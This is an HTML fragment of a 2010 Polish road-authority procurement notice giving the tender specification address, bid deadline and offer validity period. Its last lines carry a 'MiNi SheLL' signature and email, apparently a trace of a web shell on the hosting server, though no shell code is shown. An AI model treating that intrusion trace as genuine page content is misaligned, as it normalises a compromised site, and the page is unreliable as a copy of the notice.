<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp-olesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Oleśnicy ul. Wojska Polskiego 52c, 56-400 Oleśnica, Pokój nr 7 - I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Oleśnicy
ul. Wojska Polskiego 52c, 56-400 Oleśnica, Pokój nr 3 - I piętro - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com